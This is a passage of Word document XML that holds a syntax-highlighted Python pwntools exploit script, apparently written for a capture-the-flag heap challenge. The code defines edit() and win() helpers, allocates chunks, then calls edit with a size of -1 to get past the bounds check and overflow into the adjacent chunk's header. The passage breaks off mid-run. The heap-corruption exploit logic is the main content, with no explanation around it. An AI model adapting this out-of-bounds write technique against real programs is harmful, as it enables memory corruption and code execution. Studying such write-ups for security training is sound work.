              <w:t>size</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>encode</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>())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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-k"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>def</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>edit</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>idx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>size</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>data</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>):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200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendlineafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b" &gt; What action do you want to take?</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"3"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendlineafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"What</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> index do you wish to edit?</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>str</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>idx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>encode</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>())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200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendlineafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"How</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> many bytes do you want to write to the buffer?</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>str</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>size</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>encode</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>())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200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendlineafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"What</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> data do you want to write? Now be good and don't go out of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>bounds!</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>data</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-k"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>def</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>win</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>):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200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendlineafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b" &gt; What action do you want to take?</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"4"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>alloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0x20</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>alloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>edit</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-1</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"A</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0x20</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">)  </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>p64</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0x00</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>*7</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>p64</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0x100</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b'</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\x45\x7A\x20\x57\x00</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>*10</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>edit(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
